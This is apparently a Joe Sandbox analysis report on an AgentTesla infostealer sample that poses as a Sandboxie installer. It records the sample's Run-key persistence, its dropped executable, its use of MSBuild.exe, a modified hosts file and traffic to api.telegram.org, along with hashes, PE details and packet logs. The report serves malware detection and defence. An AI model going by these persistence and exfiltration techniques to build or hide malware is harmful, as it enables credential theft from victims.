                                              http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers8SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fonts.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sandoll.co.krSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.urwpp.deDPleaseSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.zhongyicts.com.cnSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://api.telegram.orgMSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sakkal.comSecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      		api.telegram.orgUnited Kingdom
                                                      		62041TELEGRAMRUfalse

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:620228
                                                      Start date and time: 04/05/202214:36:072022-05-04 14:36:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 30s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:29
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 50%
                                                      HDC Information:
                                                      • Successful, ratio: 1.1% (good quality ratio 1%)
                                                      • Quality average: 39.8%
                                                      • Quality standard deviation: 21%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 20.40.136.238, 23.211.6.115, 40.126.32.133, 20.190.160.14, 20.190.160.20, 40.126.32.140, 40.126.32.76, 40.126.32.72, 20.190.160.17, 40.126.32.74, 23.35.236.56, 20.82.210.154, 20.40.129.122, 80.67.82.211, 80.67.82.235, 20.54.89.106, 52.152.110.14, 52.242.101.226, 20.223.24.244
                                                      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, sls.update.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, store-images.s-microsoft.com, iris-de-prod-azsc-frc.francecentral.cloudapp.azure.com, displaycatalog-rp.md
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 2976 because it is empty
                                                      • Execution Graph export aborted for target ykVBUY.exe, PID 5256 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      14:37:39API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe modified
                                                      14:37:52API Interceptor615x Sleep call for process: MSBuild.exe modified
                                                      14:37:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      14:38:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ykVBUY C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1308
                                                      Entropy (8bit):5.345811588615766
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                                      MD5:EA78C102145ED608EF0E407B978AF339
                                                      SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                                      SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                                      SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                                      Malicious:true
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ykVBUY.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):841
                                                      Entropy (8bit):5.356220854328477
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
                                                      MD5:486580834B084C92AE1F3866166C9C34
                                                      SHA1:C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
                                                      SHA-256:65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
                                                      SHA-512:2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                      C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:modified
                                                      Size (bytes):261728
                                                      Entropy (8bit):6.1750840449797675
                                                      Encrypted:false
                                                      SSDEEP:3072:Mao0QHGUQWWimj9q/NLpj/WWqvAw2XpFU4rwOe4ubZSif02RFi/x2uv9FeP:boZTTWxxqVpqWVRXfr802biprVu
                                                      MD5:D621FD77BD585874F9686D3A76462EF1
                                                      SHA1:ABCAE05EE61EE6292003AABD8C80583FA49EDDA2
                                                      SHA-256:2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                                                      SHA-512:2D85A81D708ECC8AF9A1273143C94DA84E632F1E595E22F54B867225105A1D0A44F918F0FAE6F1EB15ECF69D75B6F4616699776A16A2AA8B5282100FD15CA74C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z.........."...0..|...B......n.... ........@.. ....................................`.....................................O........>..............`>.......................................................... ............... ..H............text....z... ...|.................. ..`.rsrc....>.......@...~..............@..@.reloc..............................@..B................P.......H.......8)...................|.........................................*.{.......*v.(=....r...p({...-..+..}....*....0..%........(....-..*....(z.....&..}.........*.*....................0..5........(....-..*.-.r+..ps>...z.....i(z.....&..}.........*.*............%......>....(?...(....*N..(@....oA...(....*:...(B...(....*:...(C...(....**....(....*....0..G........(....,..*..(....-...}.....*.r...p(x...&.(v.....}......&..}.........*.*..........7.......0..f........-.r7..ps>...z .....

                                                      C:\Windows\System32\drivers\etc\hosts

                                                      Download File
                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):835
                                                      Entropy (8bit):4.694294591169137
                                                      Encrypted:false
                                                      SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                      MD5:6EB47C1CF858E25486E42440074917F2
                                                      SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                      SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                      SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                      Malicious:true
                                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                                      \Device\ConDrv

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):298
                                                      Entropy (8bit):4.943030742860529
                                                      Encrypted:false
                                                      SSDEEP:6:zx3M1tFAbQtU1R30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13I30ZMt9BFN+QdCT2UftCM+
                                                      MD5:6A9888952541A41F033EB114C24DC902
                                                      SHA1:41903D7C8F31013C44572E09D97B9AAFBBCE77E6
                                                      SHA-256:41A61D0084CD7884BEA1DF02ED9213CB8C83F4034F5C8156FC5B06D6A3E133CE
                                                      SHA-512:E6AC898E67B4052375FDDFE9894B26D504A7827917BF3E02772CFF45C3FA7CC5E0EFFDC701D208E0DB89F05E42F195B1EC890F316BEE5CB8239AB45444DAA65E
                                                      Malicious:false
                                                      Preview:Microsoft (R) Build Engine version 4.7.3056.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.963790862015621
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                                                      File size:689664
                                                      MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
                                                      SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
                                                      SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
                                                      SHA512:64d959d7bc5987822a6639bb475280a7f6969c520d64e2b9d03cd3a776e4d74c0d350cc1388cff293dc9c546646860a32de3fd912ea3d2c4ae1d5047af9afc82
                                                      SSDEEP:12288:22L2IOI6QPAc9lIZx2tDPG2xMN1HHG05LZ524R8douFvjkntY9DTVYCsK5iZ1:22j6gz92AtDPGaMnnRBZ7+1F70481Z
                                                      TLSH:8DE4126C66C64332EF7931F3F2F2498127367D6EB032E289ECA212DDC9927431555A27
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$2................0..>...F......:]... ...`....@.. ...............................x....@................................

                                                      File Icon

                                                      Icon Hash:0b3b5bb333d38963

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4a5d3a
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa5ce80x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x420e.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa5ccc0x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xa3d400xa3e00False0.965679526602data7.97974117818IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xa60000x420e0x4400False0.284122242647data5.03040094587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xac0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountry
                                                      RT_ICON0xa61a80x468GLS_BINARY_LSB_FIRST
                                                      RT_ICON0xa66100x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294111472, next used block 4294178293
                                                      RT_ICON0xa76b80x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294177779, next used block 4294111986
                                                      RT_GROUP_ICON0xa9c600x30data
                                                      RT_VERSION0xa9c900x394data
                                                      RT_MANIFEST0xaa0240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Version Infos

                                                      DescriptionData
                                                      Translation0x0000 0x04b0
                                                      LegalCopyrightCopyright 2020-2021 by David Xanatos (xanasoft.com)
                                                      Assembly Version1.0.0.0
                                                      InternalNameGeneric.exe
                                                      FileVersion1.0.0.0
                                                      CompanyNamesandboxie-plus.com
                                                      LegalTrademarks
                                                      Comments
                                                      ProductNameSandboxie
                                                      ProductVersion1.0.0.0
                                                      FileDescriptionSandboxie Installer
                                                      OriginalFilenameGeneric.exe

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 4, 2022 14:37:14.472268105 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472575903 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472666979 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472697973 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472771883 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472793102 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472851038 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472878933 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.472929001 CEST49717443192.168.2.4131.253.33.200
                                                      May 4, 2022 14:37:14.496618986 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496674061 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496701956 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496731997 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496757984 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496786118 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496814013 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496839046 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496865988 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496892929 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496920109 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496948957 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.496974945 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497000933 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497029066 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497054100 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497080088 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497107029 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497157097 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497261047 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497289896 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497315884 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497379065 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497409105 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497435093 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497618914 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497648001 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497674942 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497704029 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497733116 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497759104 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497786045 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497812986 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497894049 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497922897 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497951984 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.497977972 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498004913 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498033047 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498059034 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498137951 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498167038 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498193026 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498219967 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498248100 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498272896 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498337030 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498367071 CEST44349717131.253.33.200192.168.2.4
                                                      May 4, 2022 14:37:14.498393059 CEST44349717131.253.33.200192.168.2.4
